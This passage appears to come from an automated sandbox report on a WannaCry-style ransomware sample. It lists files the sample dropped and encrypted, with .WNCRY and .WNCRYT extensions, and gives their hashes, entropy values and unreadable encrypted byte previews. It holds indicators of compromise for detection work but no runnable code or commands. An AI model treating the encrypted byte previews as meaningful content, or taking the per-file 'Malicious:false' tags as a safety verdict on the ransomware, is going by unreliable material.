                                Preview:..]...C.....8..^......."....b.R(.%..x..*r.7...u..w.G.~?~..S....V. P%s.h...A.A...[u0.qE...8..=D..F.V.F.qx.uK.<V.%.\0L..W.og.....9..R...9....h K...W.M........V....l..Y..S..J....L..W.2...W..W:....-8b.O'9...X.f.AZ...T, .'.....\$....Sd..^.u".:.y....Z....(.W.....|<....7.&.U./'>...]bn.{.......(L....;N.Na..1.|D9...._.yC......G.k...B.4......)..g.{."..U.......M.G.....VcO...E[.;.........Y...6a.."t.<.=.h&.9._....N.p.H6.....[....FK.r.3Hk.Z?J...M.pg.....K.L...bLK.T.P..2`...:...<.....H.......P.L,.N-I.grT!j.Gg..z.o..>...[..`6{x.<...VQ..s.....>.[t.Qo.Ry..Q.F...0j.W"5%.5R...+.*.LZ....ti.'......z..$!t..?..uV..EP..5.[~...}8..{.MY"...y...e&Z.\..MX.....G..2.M....R..sV..q..../_30....x...S...cP....!......FM........qy_......T]z..+...A......[Q)8......~.E.C.R ..fZa.{....90b.....7".j.......X@...z(b./Qg.=..2.]..9%.........>...aH4.........VB~.......U,..~. ....D...o.Y..........w..3_[...0m..,..~..j....'.h.e....\I.cL..HEW6]Y..._....=O.N.~.......4_..G.1b..e.?....y.N..

                                C:\Users\user\Desktop\BNAGMGSPLO\BJZFPPWAPT.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.853993705693698
                                Encrypted:false
                                SSDEEP:24:bk39A8KczKwsNYZCpWNwNt9yTWrD8Z7dh3EMz4YvrkBFfWpQNWYFuPLipdV:bk3ne7NYZCpAwNt9yTW6paMnGFe2pdV
                                MD5:4E428167762402B45B78661842C7F324
                                SHA1:2E32DE4025A131C86804FAFC5B331BEC760AF598
                                SHA-256:E87C6A8E742AE05818FA5C3E8AE5492326BB83354B599A82C2D30357D153D2AE
                                SHA-512:E842B99F507DCA0DC2D11FC8A59F1DDFAA19FB65B3665747F16BB28D7A9474C77FB9DDDE1E69832B0D6305839EB4B7E9DC0F8AF41DFDD106CF805D315EE3A41B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....Bw&..c..Y....B..g-`..xq.c..OV.._.T..i,vu...;..!..;.eM...ek.`.(..]..v.2:]....A...J5T.7...H*.8...;.r...._./...n.N...gk.....1..?].....A..r.8...."?T.1..b...(~.t....?...8..*.=..[..k...Kq.,....N.....Tk"N.@f..<.O....8.i...2.r..ya...Gm0.A.Zv0.qgc.U.............t..].,.%S..C#. H.t.l...V..6..I.cC.......Z.|&E...+b+a..|.......9..8....uD>...Z.*......tR...X.z..rAM..W.....e.g.... gkI!J{.Y.E.^z.V.y..#...N......~}a..w..c^....b..e.....dz.E.+.E..(a......(=.rv,.9..6......a.......%..-..N......1......O.,'.R%Q..)V.....7..sM-qw.d.....9j.F1.-{.Eqj>F.NKA.Y....`....&q..haJ.G.i......X.:R.A.T\...t.3.6...la.GP..7!..%...J.......$(.M.(.M.i..!...E....!..". ...Y3.>ab.*.!?X...2+.."....8.-..LI4.w.......h...k.x6V......Q..7.i+..'s..p.G..S*.L.'.>.9....,....a.!W../a.. .?P=...$....L..=./...7..2...k.....8.X....y...q.Y.P8T.2..p.c./Y.kf.....{..o....qq.....$F..}.=.3....+.=../R....D@/.75..*.0..`...7.NF.RU..._D~{C.h......My..Ie_&.6.l.."I.'..m.'T.w.?D.....{...."...N

                                C:\Users\user\Desktop\BNAGMGSPLO\BJZFPPWAPT.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.853993705693698
                                Encrypted:false
                                SSDEEP:24:bk39A8KczKwsNYZCpWNwNt9yTWrD8Z7dh3EMz4YvrkBFfWpQNWYFuPLipdV:bk3ne7NYZCpAwNt9yTW6paMnGFe2pdV
                                MD5:4E428167762402B45B78661842C7F324
                                SHA1:2E32DE4025A131C86804FAFC5B331BEC760AF598
                                SHA-256:E87C6A8E742AE05818FA5C3E8AE5492326BB83354B599A82C2D30357D153D2AE
                                SHA-512:E842B99F507DCA0DC2D11FC8A59F1DDFAA19FB65B3665747F16BB28D7A9474C77FB9DDDE1E69832B0D6305839EB4B7E9DC0F8AF41DFDD106CF805D315EE3A41B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....Bw&..c..Y....B..g-`..xq.c..OV.._.T..i,vu...;..!..;.eM...ek.`.(..]..v.2:]....A...J5T.7...H*.8...;.r...._./...n.N...gk.....1..?].....A..r.8...."?T.1..b...(~.t....?...8..*.=..[..k...Kq.,....N.....Tk"N.@f..<.O....8.i...2.r..ya...Gm0.A.Zv0.qgc.U.............t..].,.%S..C#. H.t.l...V..6..I.cC.......Z.|&E...+b+a..|.......9..8....uD>...Z.*......tR...X.z..rAM..W.....e.g.... gkI!J{.Y.E.^z.V.y..#...N......~}a..w..c^....b..e.....dz.E.+.E..(a......(=.rv,.9..6......a.......%..-..N......1......O.,'.R%Q..)V.....7..sM-qw.d.....9j.F1.-{.Eqj>F.NKA.Y....`....&q..haJ.G.i......X.:R.A.T\...t.3.6...la.GP..7!..%...J.......$(.M.(.M.i..!...E....!..". ...Y3.>ab.*.!?X...2+.."....8.-..LI4.w.......h...k.x6V......Q..7.i+..'s..p.G..S*.L.'.>.9....,....a.!W../a.. .?P=...$....L..=./...7..2...k.....8.X....y...q.Y.P8T.2..p.c./Y.kf.....{..o....qq.....$F..}.=.3....+.=../R....D@/.75..*.0..`...7.NF.RU..._D~{C.h......My..Ie_&.6.l.."I.'..m.'T.w.?D.....{...."...N

                                C:\Users\user\Desktop\BNAGMGSPLO\BNAGMGSPLO.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.795318270694324
                                Encrypted:false
                                SSDEEP:24:XXcQh/o8RhN+hMzWHsrbBdQiloENWo/gwnPphN35rVP9+:XXBTahMzWYbfQ4LEoRnPzJ5JPs
                                MD5:6F7B6A4B9F5378EF0E8174D0A919076E
                                SHA1:FBC1F490620F894EAF6CE435425829BCD1D4ADB5
                                SHA-256:F14ECF9B51D3E440A8AD1438B11B255EB8E0CCBA88F9AC7BE33B61278713F436
                                SHA-512:AEC5CDD086041E34A14E2FE8107DBBD6B3EBE37D087570FEDEAE33C86AEF75994F242F5430104EC7DD5E47BE7FA445E0054B3399FBD1608F35A313655C6B968A
                                Malicious:false
                                Reputation:unknown
                                Preview:-{Bj...->.29.SS...l3...v.la../d)..E.~K.w.e.c..e.z..B5...t.QV.#vD1|.....lW.f....-........S.Q...M..:....Q.>g.Vj5..........H......;~.....x4.Y..8..C..|...rae..,.b.+..!B..U.F....U..,..'...>4Vq..*C..-.^W.?a.[a..t..8...|..Y....@r..>>==U....V.....r...c.,..t...%t.....a..@.n.|....D.!.|.[..i......+e........U...2l}.>|..Tl.I.......m.M..J................}k...'.t.'%..N.H.....F.#.h....C{f......}..jD..}..^*`E.....;..d.g.,u.......cid..F.......)d.5.sc.....E.])........*c.gs...)r.@W.S..9Q.........{.....LB..1Yh....e....7..L.....i..9...Au.g.j.6'?E.....a.....G.@.'..8...~u1].....6.y.x..b....4i.4_q....U).O.......=...2..!.5.........7c...q.....>...[..(<.....E.E.Xv..~S..'"...Y.jmP]..:..;.+.ac.=.i.._..K...H..G/H._...`.b.*.l....$.n.qs.w.$G..,~....8z..Gf....."|.D1.zU.x4\...c6..u..b..r.....Q..g..]..Y..][...+:i..Q....m...wPi....:Mv.;.Ih.6..:3e...D..N..+.;.~...yZ...|)h....v..."..y.........F.9P..%....~..K..7)......g.T.7 ..S.Y.L..G.p..q..=i...k...r..&.#.e.r..S.RU.....

                                C:\Users\user\Desktop\BNAGMGSPLO\BNAGMGSPLO.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.842332952217968
                                Encrypted:false
                                SSDEEP:24:bkXOT0rSpsQga5rs60O8YW2Er0A9tKNbrdhcRpvOuCNAsR6AaHUxovy4rw:bkM0eSgsROdZEr0dNNivO5w0xovy4M
                                MD5:6674D02F14CF00CB957086A53C9226C7
                                SHA1:FFD9E163B1B9F26BB47D8A8D3EB2DDF04F3D18E5
                                SHA-256:3A17CEA9B6CF01AA3EFAD30E9511F488809ADFBDAAB98E123EE31E7A49CE093D
                                SHA-512:85858353224FD27A80992E01C77ADA0C6F3C2FD81611EB24F779536199E474C929A83457E234465A5A1D48D9AEC44393628361E7CE414699EB50CB8F90617685
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....p..j....zJ...8.....1.6..]..qE....h.k"_...YS..T.JZS`......z...N..'..rt.3......o.....-N..=.e8.0....Q.~......^7...,..Fc...fS..8O.....6...kIi1#c....*w..Y..rD...O.)m.P..<...UWqA.].."=s...{U.Q.....[.....4....yI.$.[..4F.-..........u....RR...6]s.o..................V}..`.&..E....;..=.....Q_1Q.....**.D....j..H....".eH[.0.]\..!.5.e:...B<.h.qM@y...6/S.m')\#.o.N......6/.g...]..7..Xt.W..@.._.ZA...=.`.5bm."R.ikQ..2./!.3.w....?f.1.".~..r.U.^'.J#^...o...jY..:A..q.S%.s....2...?h... .../....D..=....YR.,.M.g.I..K.=.....#..N5u..h...kI.......6W.RRv..G...|.J6#.-....2`d../.yV:_J......A.D/...>......)1..z..S2.......MU&..<K....../b..&o....i!\`.h....7%....]...1].T-^...b......n.93. ..O..Q...^..K...l......cx...K1%..s.@..xEj....&..,:...j..C..6...v..8.X'n...#......%.Pq.m.L..Efc..nu9._...B...$%...\....>.. Y....JD.J....zN.)...qM.1..5........s..>...%].?N_(X........$W~.6..........*.i.W...V.n.[kZ.9q.u.-...._1K.......Y3Q....S..{....}=]...6.;.....Z'L..'.+...i)

                                C:\Users\user\Desktop\BNAGMGSPLO\BNAGMGSPLO.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.842332952217968
                                Encrypted:false
                                SSDEEP:24:bkXOT0rSpsQga5rs60O8YW2Er0A9tKNbrdhcRpvOuCNAsR6AaHUxovy4rw:bkM0eSgsROdZEr0dNNivO5w0xovy4M
                                MD5:6674D02F14CF00CB957086A53C9226C7
                                SHA1:FFD9E163B1B9F26BB47D8A8D3EB2DDF04F3D18E5
                                SHA-256:3A17CEA9B6CF01AA3EFAD30E9511F488809ADFBDAAB98E123EE31E7A49CE093D
                                SHA-512:85858353224FD27A80992E01C77ADA0C6F3C2FD81611EB24F779536199E474C929A83457E234465A5A1D48D9AEC44393628361E7CE414699EB50CB8F90617685
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....p..j....zJ...8.....1.6..]..qE....h.k"_...YS..T.JZS`......z...N..'..rt.3......o.....-N..=.e8.0....Q.~......^7...,..Fc...fS..8O.....6...kIi1#c....*w..Y..rD...O.)m.P..<...UWqA.].."=s...{U.Q.....[.....4....yI.$.[..4F.-..........u....RR...6]s.o..................V}..`.&..E....;..=.....Q_1Q.....**.D....j..H....".eH[.0.]\..!.5.e:...B<.h.qM@y...6/S.m')\#.o.N......6/.g...]..7..Xt.W..@.._.ZA...=.`.5bm."R.ikQ..2./!.3.w....?f.1.".~..r.U.^'.J#^...o...jY..:A..q.S%.s....2...?h... .../....D..=....YR.,.M.g.I..K.=.....#..N5u..h...kI.......6W.RRv..G...|.J6#.-....2`d../.yV:_J......A.D/...>......)1..z..S2.......MU&..<K....../b..&o....i!\`.h....7%....]...1].T-^...b......n.93. ..O..Q...^..K...l......cx...K1%..s.@..xEj....&..,:...j..C..6...v..8.X'n...#......%.Pq.m.L..Efc..nu9._...B...$%...\....>.. Y....JD.J....zN.)...qM.1..5........s..>...%].?N_(X........$W~.6..........*.i.W...V.n.[kZ.9q.u.-...._1K.......Y3Q....S..{....}=]...6.;.....Z'L..'.+...i)

                                C:\Users\user\Desktop\BNAGMGSPLO\DUUDTUBZFW.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.823856327616033
                                Encrypted:false
                                SSDEEP:24:Z0C6Bje+sZA8N71mPAlgLdlemH+FfbdgcWeh1JxN:xAje+sZZh1LlgLnUMe9
                                MD5:9AB06F4CB3DC2BF7166E3E2C19AC9B2C
                                SHA1:22F6F23198041CCA6C76435AB902728A91E58177
                                SHA-256:0BE27A9DC89024B80F64F43950958799493F34C213E23601990C283E72A965BD
                                SHA-512:E186C95BBD78B48E08B41DE9F7CA2D9D2A66A0CC55C0E5FDE36AFD7016974B49BF5AFB01B26AF82534FE90077B1E83FC5DE53E22EDB308426257CE37F19CEE4F
                                Malicious:false
                                Reputation:unknown
                                Preview:....f....... ....dC....+{..........4.y.....oend...#+*.hZ.&.7..e.OI~..6^......e.Ov..<..7.}....H...9+. ..q-.J...p.'.k*C.i....S..o.>`*my...<........D.G...0*6.9Z$<;....A.D...P.....v...7.;...........fy...ku}.}...'..F....#..#..z.Q..N?...9.'.W:KbE.<s.....Q.........8...V..KXY}A.S...F)".....U 6*.1.]nU...].V.r..m..oD..PIg..m!.v.{.Ki.w...}.UF..q.I.u..f..B.....R...U}..ObY..3S.F.[!...I...=...'....w....b..u.V..3:$kjj7W..7:d..u..P..=..x.p.s....B.....v9@....t.......z`K.......k..!N...m.9+..D...HpsC.'..r.SS).....@....lS.%..`.B._..._<.....;JF...lh..............Ld3.v..?.^wA....;n.@|..Z<R.L.{.m.$.d.0h&6.]...`.[.(..z....;..W..JC.6.....r....jjI..Q.fH/c...K..?q.9.c.......C...+bi..(t..Q.tU...v.....).}....H.W.i........C.Kt.+.O1.\X..iU._+..3....K{..P..R.3P....M...T..>{....7......A......3.%>-RG{.$Y*znI.....I%/..g..B.{\.6...D...X.7..";'.hg....L5..xZu..JT..YS.S..{..^G..lX...I.f..A...1.jU.pz...... .Tp......;...H.f.>.4W...*ag.X$.f.5~r./wcH. ..+yE../w.k....}(.

                                C:\Users\user\Desktop\BNAGMGSPLO\DUUDTUBZFW.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8405169029249535
                                Encrypted:false
                                SSDEEP:24:bk45SfNfeB0BO8Uboj1XFtrqYhCRMiCHYy98gTMCcQKdXGyh:bk4Sw0BxUbMVBqWxXwdXGyh
                                MD5:AEACAEF7C24B22F9A111EE24EA00560C
                                SHA1:182EAA32BA9B9937B49F46472023A6046C4C18C5
                                SHA-256:10EE50DE5BE77492DDA158698966E56DB095D97EDB8EC193C67E0CAD79C18EE2
                                SHA-512:D86938B8FE72B5A5954062A55E3DB8183969EEAD8D14C978B779C6A6DB3325DF961D7C6EFA931DCF7856773E8BDD2FE8E154291F2FC55AF987D4938E007B4AAE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......r!..6.].>7...]"{......1o$...{{t`^....'..!c...,g_v)...t.`".....hF.... .s...zD<.x@.d.w..p@..;;....V..E.|.........=V~n.....p\.U....2..'.:.-. ..Fq.-7E....T..i..2t|y.L....N...`....e.N..L7{.wD...L..Dj...)......i..e...^....'..... k5.{.)..7.....y`.u..2H.............4.X....>.?L.Y&$..r...T..=.x=k...\..=...j...!.........`C.'...T..{14.......#.n|E..w.h...-.......I.PT.|..(.q..FeM-......A.r~\...g@...a.2.:.fe?~.k..O*..6..[.fLLwqq.Bf..)...L,k...Z.....1s8...... ...jx..rS.c...;........a.~.d....."...&.%.X)....%. $5........~].."r.........o.c:.g_..D..r.....#...O.~@\..;...g...NZ.o.....]..7..p......2j.D.4m..H.1.......r.m..,...Lh...r....U..S.!.g.JZ...../k._.D.$.A....5..=.g.......$np.......W..@P.2.......`.'....Et.D3.....B...B... ...O...I.%.^A.......k..;...Sj....H..K..%...Dj.X..D.../Y .\...I.E..Dq....n..3.=...c.d...t...E...Yr..*L..e..E^ Yf5H...r...Lo../...j..]....Q1.........K...p.....=......R..;.i..qYD=....7.L...I..F..<......<.Qb....#x.%;.g4..fY..E..*.

                                C:\Users\user\Desktop\BNAGMGSPLO\DUUDTUBZFW.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8405169029249535
                                Encrypted:false
                                SSDEEP:24:bk45SfNfeB0BO8Uboj1XFtrqYhCRMiCHYy98gTMCcQKdXGyh:bk4Sw0BxUbMVBqWxXwdXGyh
                                MD5:AEACAEF7C24B22F9A111EE24EA00560C
                                SHA1:182EAA32BA9B9937B49F46472023A6046C4C18C5
                                SHA-256:10EE50DE5BE77492DDA158698966E56DB095D97EDB8EC193C67E0CAD79C18EE2
                                SHA-512:D86938B8FE72B5A5954062A55E3DB8183969EEAD8D14C978B779C6A6DB3325DF961D7C6EFA931DCF7856773E8BDD2FE8E154291F2FC55AF987D4938E007B4AAE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......r!..6.].>7...]"{......1o$...{{t`^....'..!c...,g_v)...t.`".....hF.... .s...zD<.x@.d.w..p@..;;....V..E.|.........=V~n.....p\.U....2..'.:.-. ..Fq.-7E....T..i..2t|y.L....N...`....e.N..L7{.wD...L..Dj...)......i..e...^....'..... k5.{.)..7.....y`.u..2H.............4.X....>.?L.Y&$..r...T..=.x=k...\..=...j...!.........`C.'...T..{14.......#.n|E..w.h...-.......I.PT.|..(.q..FeM-......A.r~\...g@...a.2.:.fe?~.k..O*..6..[.fLLwqq.Bf..)...L,k...Z.....1s8...... ...jx..rS.c...;........a.~.d....."...&.%.X)....%. $5........~].."r.........o.c:.g_..D..r.....#...O.~@\..;...g...NZ.o.....]..7..p......2j.D.4m..H.1.......r.m..,...Lh...r....U..S.!.g.JZ...../k._.D.$.A....5..=.g.......$np.......W..@P.2.......`.'....Et.D3.....B...B... ...O...I.%.^A.......k..;...Sj....H..K..%...Dj.X..D.../Y .\...I.E..Dq....n..3.=...c.d...t...E...Yr..*L..e..E^ Yf5H...r...Lo../...j..]....Q1.........K...p.....=......R..;.i..qYD=....7.L...I..F..<......<.Qb....#x.%;.g4..fY..E..*.

                                C:\Users\user\Desktop\BNAGMGSPLO\EEGWXUHVUG.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8104928499402515
                                Encrypted:false
                                SSDEEP:24:4+Zr8xJi0CzUmUvWiUJ8+dOel73lP98ggP76a8nIH74:4i8xJRCfVW+dtZ67PBHH74
                                MD5:DFF975324BE65D819D01F7A2688AF7B6
                                SHA1:E1711C87D624B64ADEECB923F76076CC678D0E5E
                                SHA-256:4D40482E3483E2475965DD1C89EF9FF7B58B51EE60DA7B59C445DCE1CA64128B
                                SHA-512:06153A50903DB16B221E344BA361D9BA8A9F923336508E1B0621947D7787C6308732424063714C195440AEC5AE8B2AE58B17D9D6046F747002A9EAAB755711E2
                                Malicious:false
                                Reputation:unknown
                                Preview:`..:fV..*......n!.<.q.+...6.lp*.].Ea:...Z.H.(.].....=.E.a.....A...E....S..?..K>c.Y.)...;.r..N..z...q.n....S...f....zU..q6.@.9f.q.J....... o.....*q......).[.gF.'...}..m....m.-..*.=..`-...&R...-..s!}.Y.d;....[....S..C$,..._..."p.4..[R.[z.n..(....X.......>..7.m.(..J....V.NN.....c....=.>..h5...;.....l....g..8..`...,.,J..W....F....46B...^..R~$#...HU..S^.1.t.jb....s..}+.w....<...&.;..-....F.#.}g..).r.0.F.~......h.|....q.R.#DaY..wNR....Ox.V..-.W.o...?...-.^....0.9.;j:..;. ..t"..`.l.......)1......PmI...:........AN..8.. ......H..K.I.....)..+.Z....8S...4...E..kt.a.....|n.......G.+./.0...6..2.!y.....T<.....%.9.K*..F..@.0.-...f.M...w:..|...|..}i.....L....B.N&7tK..F+.....5...ao`..........jnu.L.L5h...O........~....~K.].t./:. F..z.:.k.N./,..7^....;..*.e....?...q..5.:A.u<w..fA.5.:...`.N.x.I.9..q.H....\..+$...Q.. 3......j6.*s.....$#....xM..k...D....*.|p#...P+...m.Qdqg......<.U/....g[..S.pdh@z. ^.?.0..h...x.H..X..M..{hz.k.x.j.'tm...v?.]&...).....mn.........

                                C:\Users\user\Desktop\BNAGMGSPLO\EEGWXUHVUG.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.844631326477872
                                Encrypted:false
                                SSDEEP:24:bkiQ23ObF6FMmQ+QQ45Z8PeFcph7BvP8TFl8prHFcCgFZQ6XS87/XuV0pw:bkb23y6GmvN4eeFcbeTFlqqFZQinzuV1
                                MD5:E45BA418D78334F5706825BF08044FB3
                                SHA1:B8A9C7915843BCF865626923FB01AADD0E502868
                                SHA-256:F4D276F5571605735DBBFE4D7A031B6C756F0A45A5684BA3A797F35110EB0164
                                SHA-512:D55E7713C49B020728D4B59EE1A22963B2F2D332882F74C2978CC777758245047AC652507340768C79E87E38354D82AED0B7490026A80FEFA0912676A4D67CD3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......p.*.5.o.`...[.|...1]..).....;K.._.j.@x...R..W.WP...[.....ASj.|.)."..ZU...."BM{..\+X.l8.$xg.E...O.2ix.y=.;<..KT.....e... ...kSy.T..W.Z.P...W....k..dbP.RY....!... ]..3...(...q...SK.o.<..M+...../..w...-.y..WD[.{c../v.{..(.B6.@Q.a+.......w....L..u.?.}.............B/.VT>......M......p. .p.X.v.....]..U...R............f...[.<@=.....L....`...O1.I..[S.5s.......'(......`w...o....c...4...T`.A..B.......].....]..M.E+.|m...5...Ap{.1.97 .......n.....B(.#..=2eX...b.Z....&....\\T.o]>.V....W.O..P..^Y.|........&...b.?f.y...44.).B..oLR......O.. E..+c.Pz.H.\.E..}....,...V..z...1;..!.Yh[.O..8.1<h{.h.....e.......G%+9.z.s[...l........IjG6...L~...w..5...;J.r..........,i.A.ao.%.......pl .k...m...U.9.....Y....QG;.)H.i.......7.|..UU[6..b.....j....3.........._..LK^.v-u....m~'..P.r.J.C....@>R.F._E...\. v.$D....#.ER"......,..+.H.......d...N!.0.tT.gf..}.9.z...F.L...."YrF../.E.&72/.t.[]..|"\..7.V...W.gp/|.E....P.X.h....0..!..]....#........!f.ZR{l..6P.H.Q...B..O1

                                C:\Users\user\Desktop\BNAGMGSPLO\EEGWXUHVUG.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.844631326477872
                                Encrypted:false
                                SSDEEP:24:bkiQ23ObF6FMmQ+QQ45Z8PeFcph7BvP8TFl8prHFcCgFZQ6XS87/XuV0pw:bkb23y6GmvN4eeFcbeTFlqqFZQinzuV1
                                MD5:E45BA418D78334F5706825BF08044FB3
                                SHA1:B8A9C7915843BCF865626923FB01AADD0E502868
                                SHA-256:F4D276F5571605735DBBFE4D7A031B6C756F0A45A5684BA3A797F35110EB0164
                                SHA-512:D55E7713C49B020728D4B59EE1A22963B2F2D332882F74C2978CC777758245047AC652507340768C79E87E38354D82AED0B7490026A80FEFA0912676A4D67CD3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......p.*.5.o.`...[.|...1]..).....;K.._.j.@x...R..W.WP...[.....ASj.|.)."..ZU...."BM{..\+X.l8.$xg.E...O.2ix.y=.;<..KT.....e... ...kSy.T..W.Z.P...W....k..dbP.RY....!... ]..3...(...q...SK.o.<..M+...../..w...-.y..WD[.{c../v.{..(.B6.@Q.a+.......w....L..u.?.}.............B/.VT>......M......p. .p.X.v.....]..U...R............f...[.<@=.....L....`...O1.I..[S.5s.......'(......`w...o....c...4...T`.A..B.......].....]..M.E+.|m...5...Ap{.1.97 .......n.....B(.#..=2eX...b.Z....&....\\T.o]>.V....W.O..P..^Y.|........&...b.?f.y...44.).B..oLR......O.. E..+c.Pz.H.\.E..}....,...V..z...1;..!.Yh[.O..8.1<h{.h.....e.......G%+9.z.s[...l........IjG6...L~...w..5...;J.r..........,i.A.ao.%.......pl .k...m...U.9.....Y....QG;.)H.i.......7.|..UU[6..b.....j....3.........._..LK^.v-u....m~'..P.r.J.C....@>R.F._E...\. v.$D....#.ER"......,..+.H.......d...N!.0.tT.gf..}.9.z...F.L...."YrF../.E.&72/.t.[]..|"\..7.V...W.gp/|.E....P.X.h....0..!..]....#........!f.ZR{l..6P.H.Q...B..O1

                                C:\Users\user\Desktop\BNAGMGSPLO\EFOYFBOLXA.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8006151324953565
                                Encrypted:false
                                SSDEEP:24:53Qj6hHuS8vIY+bH/wzU3L4aqtdOnbTO3CptIfa:5gjNITbYg3L4LYTOSvIC
                                MD5:4B6E762FC13C9E8CAA9FD63655984795
                                SHA1:C5ACC1D73C41D651D506DCBE3E0C61232AFAEA61
                                SHA-256:3311C36FC48E09A654FBE97AE58AC1A67212BDEF51E66AAEF330D588E9CE0E99
                                SHA-512:2F365D00E352505DB4529F963F450CF2153A4E0B4C88C360F4366B206BE82EB660FF78843C716F92E0433FB6A7D3D68BB5F6AD711962B3A8BCD135EDD592D500
                                Malicious:false
                                Reputation:unknown
                                Preview:.i....}......E..Gf.k..3.".z.:.$.....hd.g.<;...+(.e....=....N{..9.s..DP..P.d........al}....BC.Ru.Up]..../.z._n`.e...5..]!..w.......D.#...<...&.&..[...WE,t.I_.<.k*k..4..|.....S........D/.|Rx.,.Yu.......Z.4@.S.].d.^..."E.y.................$g...KJ#Uq..h....^".k..o.3....q.<.%....w..b.....[.T7..$....\.4G....=J..g...9.g7.........44.&..Z....(..1j.....(..b7.t.AR/.A...h....jYf......k["J U.h.l....$.!...0t.....x.i.Y.{..^1...c.K,HQls...L. .<....k^f.1.m.....S$..cJ...|..K..eU..0u.....[.(..2... ...N!..!..[= L...u#... ...-.x.>....F.......#,...x.@i...X...kfV..^.$.Q.<.t...U...........j....`..o.P-..4NT..t.,1....U~.7.a."D..}......*X.II.$.V...{.%|..E...G}....y/....3...e&......r.?.L.....B.....wlx....E...B.......U...es...|.......8)%)..O........n.@......f5.3VP."..v)...GV.~.i.L6......b......)W...).5.$...'.7..x..w)c..#....v..#..R.n...4.=.Fu..,....9..q.mW..NSS.7....\|.yP.C<..h..Z....T....d..*mq;......R....xm.%...v..p\Tl...z.#..u.O.......v~k..t.r.......pg...t.5..H.....

                                C:\Users\user\Desktop\BNAGMGSPLO\EFOYFBOLXA.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8461941818618905
                                Encrypted:false
                                SSDEEP:24:bkaLstMAU/fh349zRUhisuRgMEpdF0FDfcVjZBc4gGd+Ugx/WVebuzc2i2:bkaLdAMh+1UXuWxXGfq9K5Q+5ec2i2
                                MD5:6B64535AD7A5DC3C6D076002600F1B54
                                SHA1:B70183C73D3487ECE36C768ED8FDA7F5DE156097
                                SHA-256:F8F9EC3747BFFDB05C9B1E34D1BF585AC6B8F753FCED7B9F98F856A2DD097900
                                SHA-512:D728695F93266B18211C421DD88EE03CBE7B540EE5F435F376F7597B1D87BDED3ED5B3F95522789AFB39C61321C732801D32465808F27766B25B54A31226D26F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....S......~.Q....}D.e....z.].C9.....K..C....e.Z.}..V^.4?....,..nI.<l.D.y[..U7...3..s..(E...bw...V..+gX.\...m.!a.3:[4.o........D2k7.j..h..C..<,+....V "`.....%I.R.h..$...(U..9....`...eu.g...d.,Y.........\..64....6H....D...IC...l...q...|.;.................O..Eb..XTS^.....v]...W/.V....(K....R.....O.rivG.[..#..c.CM2..i..TN.v.[....H.=.q.....".._..(..z=w./MM..A[..x.*..p.=...|..t.Gx.0W4d.}".(.........).h..N....<.P.J..W...=..%.d..l.5.Y..m.\M..).,7.p...#.(..O.C..*.'..#.@.&...g...=.tY.EQ8...p...( .j..A.cZ..=.......fA..).....Q..-."V&.g.S..sX..?Jx.fo}:\*.y.<....L.~>.+.M...Js.,....2........D....S&N.8O.....(.Vv..m.+..f.I....5TR<.....aT1i.$c.K4.d.>N...ov.%d....nQR......j-8....)........L%..H..e..w.<.\Y%.S...N#s........+.d.j.[.W......./........xZ....A.....c..+/n...._.....P.O5i.T.d..a...yl..C^...........n.SI...t........g.I.os..e..'....T^h...4...wz..4.~.4.Y..Z..D..z.._.n...i.U.Sk......vu.blS.%yYd._.JF...$..2.Q..?.i...\.%.....V..HO.8..E....<.m..

                                C:\Users\user\Desktop\BNAGMGSPLO\EFOYFBOLXA.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8461941818618905
                                Encrypted:false
                                SSDEEP:24:bkaLstMAU/fh349zRUhisuRgMEpdF0FDfcVjZBc4gGd+Ugx/WVebuzc2i2:bkaLdAMh+1UXuWxXGfq9K5Q+5ec2i2
                                MD5:6B64535AD7A5DC3C6D076002600F1B54
